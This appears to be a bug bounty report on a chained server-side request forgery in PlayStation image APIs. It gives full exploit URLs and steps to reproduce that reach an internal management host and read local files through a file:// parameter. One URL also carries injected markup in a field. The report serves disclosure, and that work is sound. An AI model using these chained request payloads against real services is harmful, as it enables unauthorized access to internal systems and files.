SSRF chained to hit internal host leading to another SSRF which allows to read internal images.

## Report Summary: We found an SSRF at https://image.api.np.km.playstation.net/ Vulnerable endpoints: `/images` , `/dis/images`. using image GET parameter. ##Description This endpoint allows us to fetch a remote image over HTTP protocol using the `image` GET parameter and convert them to the desired format using the GET parameter `format`. We found that this could hit internal hosts however the response needs to be a valid image and also `file` protocol isn't working here. For example : The host https://store.mgmt.playstation.com/ (**mgmt** keywords hosts are meant to be internal for PSN) will respond with a 403 however I found it hosts an image that can open using this SSRF. https://store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image?_version=00_09_000&platform=chihiro&w=225&h=225&bg_color=000000&opacity=100 This will give you a 403. **Using SSRF to open this URL:** https://image.api.np.km.playstation.net/images/?format=png&image=https%3a//store.mgmt.playstation.com/store/api/chihiro/00_09_000/container/US/en/999/UP4134-CUSA00329_00-ONNTGAME00000001/1429722215000/image%3f_version%3d00_09_000%26platform%3dchihiro%26w%3d225%26h%3d225%26bg_color%3d000000%26opacity%3d100 ##Taking it further and finding another SSRF to extract internal images using `file` protocol. We found an internal host of PSN which serves remote images with our given text (PhantomJs) on the further analysis we found this service could make use of `file` protocol as well and hence we could extract internal images as PoC. Host : https://dis.api.np.playstation.net/dis/v1/banners?backplate=https://homer.dl.playstation.net/pr/bam-art/272/352/44592b67-85ac-41d6-b310-334363c5ea58.jpg&dimensions=790x250&price=$36.99&price_discount=$24.41&format[]=PS4&type=Full Game&locale=en_CA&cta=Download Now!&output=png&tpl=banner-web-store&store=game&region=us& Opening the above URL will result in a timeout. We use our SSRF to hit on this host and abuse the other SSRF to read internal files/images. https://image.api.np.km.playstation.net/dis/images/?format=png&image=https%3A%2F%2Fdis.api.np.playstation.net%2Fdis%2Fv1%2Fbanners%3Fbackplate%3Dfile:////usr/share/pixmaps/system-logo-white.png%26dimensions%3D790x250%26price%3D%2436.99%26price_discount%3D%2424.41%26format%5B%5D%3DPS4%26type%3DF%22%3e%3c%73%3eull+Game%26locale%3Den_CA%26cta%3DDownload+No%26output%3Dsvg%26tpl%3Dbanner-web-store%26store%3Dgame%26region%3Dus%26 **Flow is:** image.api.np.km.playstation.net -> dis.api.np.playstation.net -> fetches the local image using `file://`-> adds given data on image -> image served on (dis.api.np.playstation.net) -> images served to us (using image.api.np.km.playstation.net) ##Steps to reproduce: - Open https://image.api.np.km.playstation.net/dis/images/?format=png&image=https%3A%2F%2Fdis.api.np.playstation.net%2Fdis%2Fv1%2Fbanners%3Fbackplate%3Dfile:////usr/share/pixmaps/system-logo-white.png%26dimensions%3D790x250%26price%3D%2436.99%26price_discount%3D%2424.41%26format%5B%5D%3DPS4%26type%3DF%22%3e%3c%73%3eull+Game%26locale%3Den_CA%26cta%3DDownload+No%26output%3Dsvg%26tpl%3Dbanner-web-store%26store%3Dgame%26region%3Dus%26 To open `file:////usr/share/pixmaps/system-logo-white.png` on `dis.api.np.playstation.net` host using `image.api.np.km.playstation.net`. ## Impact SSRF to local images read using `file:///`.